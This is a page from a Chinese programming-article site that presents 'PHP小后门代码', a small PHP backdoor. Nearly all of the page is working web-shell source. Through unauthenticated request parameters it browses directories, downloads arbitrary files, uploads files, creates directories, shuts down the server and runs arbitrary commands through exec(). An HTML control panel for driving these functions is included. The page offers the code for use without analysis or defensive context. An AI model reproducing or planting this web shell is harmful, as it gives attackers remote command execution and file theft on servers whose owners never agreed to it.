欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  php教程

PHP小后门代码

程序员文章站 2022-05-16 18:25:57
...

1. [代码][PHP]代码

<?php
    $fp = '';
    $path = '';
    if(empty($_GET['action'])){
        if(empty($_GET['path'])){
            $_path = dirname(__FILE__);
        }else{
            if(is_dir($_GET['path'])){
                $_path = $_GET['path'];
            
            }else{
            
                $_path .=  dirname($_GET['path']);
                $file_name = $_GET['path'];
                if (!file_exists($file_name)) { //检查文件是否存在
                    echo "文件找不到";
                } else {
                    $file = fopen($file_name,"r"); // 打开文件 
                    // 输入文件标签
                    Header("Content-type: application/octet-stream");
                    Header("Accept-Ranges: bytes");
                    Header("Accept-Length: ".filesize($file_name));
                    Header("Content-Disposition: attachment; filename=" . str_replace(array(dirname($_GET['path']),'/'),'',$file_name));
                    // 输出文件内容
                    echo fread($file,filesize($file_name));
                    fclose($file);
                    exit;
                } 


            }
        }
    }else if($_GET['action'] == 'close'){
        $time = intval($_GET['time']) > 0 ? intval($_GET['time']) : $_GET['time']; 
        exec('shutdown -s -t '.$time);
        $_path = $_GET['path'];
    }else if($_GET['action'] == 'cancel'){
        exec('shutdown -a');
        $_path = $_GET['path'];
    }else if($_GET['action'] == 'mkdir'){
        $_path = $_GET['path'];
        $name =  $_GET['name'];
        $_path .=  $name;
        mkdir($_path);
    }else if($_GET['action'] == 'upload'){
        $_path = $_POST['path'];
        $name =  $_FILES['name'];

        move_uploaded_file($name['tmp_name'],$_path  . $name['name'] );
    }else if($_GET['action'] == 'ord'){
        $_path = $_GET['path'];
        $name =  $_GET['name'];
        exec($name);    
    }
	$dir = dir($_path);
?>
<table width="100%" border=1 >

<tr>
	<th colspan=3>
		<form method="get" action="" >
		目录:<input type="text" name="path" value="<?php echo $_path ?>" />
		<input type="submit" value="跳转" />
		</form>
        <input type="text" value="100" id="time">秒
        <input type="button" value="关机" onclick="location.href='?time='+document.getElementById('time').value+'&action=close&path=<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>'" />
        <input type="button" value="取消关机" onclick="location.href='?action=cancel&path=<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>'" />

		<form method="get" action="" >
		创建目录:<input type="text" name="name" value="" />
        <input type="hidden" name="path" value="<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>" />
        <input type="hidden" name="action" value="mkdir">
		<input type="submit" value="创建" />
		</form>

        <form method="get" action="" >
		执行命令:<input type="text" name="name" value="" />
        <input type="hidden" name="path" value="<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>" />
        <input type="hidden" name="action" value="ord">
		<input type="submit" value="创建" />
		</form>

        
		<form method="post" action="?action=upload" enctype="multipart/form-data" >
		文件上传:<input type="file" name="name" value="" />
        <input type="hidden" name="path" value="<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>" />
		<input type="submit" value="上传" />
		</form>
	</th>
</tr>
<?php
	while($fp = $dir->read()){
?>	
<tr>
	<td><a href="?path=<?php echo $fp == '..' ? @dirname($_path) : $_path.'/'.$fp; ?>"><?php echo $fp ?></a></td>
	<td>删除</td>
	<td>下载</td>
</tr>
<?php
	}
?>
</table>
相关标签: PHP